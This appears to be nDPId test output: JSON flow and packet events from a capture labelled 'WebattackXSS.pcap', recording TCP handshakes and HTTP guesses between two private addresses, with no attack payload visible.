+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1499347120603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347120603,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0kIa0KsLxQGq1KAScSCGiQAAAgQFtAQCCAoD4064ATl9QQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1499347120603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347120603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA015NAAD4G7kSsEAABwKgKMtJCAFDFAarUGtCrDIAQAOUlkQAAAQEICgE5fUED4064"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347123174,"flow_last_seen":1499347123174,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347123174,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1499347123174,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347123174,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j6NAAD4GNi2sEAABwKgKMtJcAFBy9vBnAAAAAKACchCn+wAAAgQFtAQCCAoBOX\/EAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1499347123174,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347123174,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0lx1HkCocvbwaKAScSCd9QAAAgQFtAQCCAoD41E7ATl\/xAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":3,"flow_last_seen":1499347123175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347123175,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j6RAAD4GNjSsEAABwKgKMtJcAFBy9vBodR5AqYAQAOU8\/QAAAQEICgE5f8QD41E7"} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1324,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347124454,"flow_last_seen":1499347124454,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347124454,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1499347124454,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347124454,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NtZAAD4GjvqsEAABwKgKMtJqAFC8CbfSAAAAAKACchCWLwAAAgQFtAQCCAoBOYEEAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1499347124454,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347124454,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0moH9pX9vAm306AScSCivAAAAgQFtAQCCAoD41J7ATmBBAEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1326,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1499347124455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347124455,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NtdAAD4GjwGsEAABwKgKMtJqAFC8CbfTB\/aV\/oAQAOVBxAAAAQEICgE5gQQD41J7"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347125743,"flow_last_seen":1499347125743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347125743,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1499347125743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347125743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IcxAAD4GpASsEAABwKgKMtJ4AFAiLqOKAAAAAKACchBDAwAAAgQFtAQCCAoBOYJGAAAAAAEDAwc="} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1499347125743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347125743,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0niyGNhRIi6ji6AScSBh1wAAAgQFtAQCCAoD41O9ATmCRgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":1499347125743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347125743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ic1AAD4GpAusEAABwKgKMtJ4AFAiLqOLshjYUoAQAOUA3gAAAQEICgE5gkcD41O9"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347128311,"flow_last_seen":1499347128311,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347128311,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1499347128311,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347128311,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83+lAAD4G5easEAABwKgKMtKSAFBV0VshAAAAAKACchBVLQAAAgQFtAQCCAoBOYTIAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1499347128311,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347128311,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0pKrZqcYVdFbIqAScSCpagAAAgQFtAQCCAoD41Y\/ATmEyAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1356,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":3,"flow_last_seen":1499347128312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347128312,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03+pAAD4G5e2sEAABwKgKMtKSAFBV0Vsiq2anGYAQAOVIcQAAAQEICgE5hMkD41Y\/"} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1366,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347129584,"flow_last_seen":1499347129584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129584,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1366,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1499347129584,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347129584,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rtVAAD4GFvusEAABwKgKMtKgAFDfKCjSAAAAAKACchD81wAAAgQFtAQCCAoBOYYHAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1499347129584,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347129584,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0qA\/BA1B3ygo06AScSBWEQAAAgQFtAQCCAoD41d9ATmGBwEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1368,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":3,"flow_last_seen":1499347129585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347129585,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rtZAAD4GFwKsEAABwKgKMtKgAFDfKCjTPwQNQoAQAOX1GAAAAQEICgE5hgcD41d9"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346994731,"flow_last_seen":1499347000612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346994731,"flow_last_seen":1499347000612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346997314,"flow_last_seen":1499347002612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346997314,"flow_last_seen":1499347002612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346998578,"flow_last_seen":1499347003612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52548,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346998578,"flow_last_seen":1499347003612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347001111,"flow_last_seen":1499347006612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52574,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347001111,"flow_last_seen":1499347006612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347002399,"flow_last_seen":1499347007612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52588,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347002399,"flow_last_seen":1499347007612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52588,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347003695,"flow_last_seen":1499347009612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347003695,"flow_last_seen":1499347009612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347132137,"flow_last_seen":1499347132137,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347132137,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1499347132137,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347132137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pedAAD4GH+msEAABwKgKMtK6AFAZEC1iAAAAAKACchC7yAAAAgQFtAQCCAoBOYiFAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1499347132137,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347132137,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0rps\/2\/vGRAtY6AScSCB2QAAAgQFtAQCCAoD41n8ATmIhQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1390,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1499347132138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347132138,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pehAAD4GH\/CsEAABwKgKMtK6AFAZEC1jbP9v8IAQAOUg4QAAAQEICgE5iIUD41n8"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347133434,"flow_last_seen":1499347133434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347133434,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1499347133434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347133434,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Et1AAD4GsvOsEAABwKgKMtLIAFBRGZsUAAAAAKACchAUuwAAAgQFtAQCCAoBOYnJAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1397,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1499347133434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347133434,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0sgnZz2uURmbFaAScSBRYQAAAgQFtAQCCAoD41tAATmJyQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1398,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":3,"flow_last_seen":1499347133435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347133435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Et5AAD4GsvqsEAABwKgKMtLIAFBRGZsVJ2c9r4AQAOXwaAAAAQEICgE5ickD41tA"} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347134702,"flow_last_seen":1499347134702,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347134702,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1499347134702,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347134702,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wYFAAD4GBE+sEAABwKgKMtLWAFCOukqHAAAAAKACchAmXAAAAgQFtAQCCAoBOYsGAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1412,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1499347134702,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347134702,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0tYST2RqjrpKiKAScSBQIQAAAgQFtAQCCAoD41x9ATmLBgEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1499347134703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347134703,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wYJAAD4GBFasEAABwKgKMtLWAFCOukqIEk9ka4AQAOXvKAAAAQEICgE5iwYD41x9"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347137239,"flow_last_seen":1499347137239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347137239,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 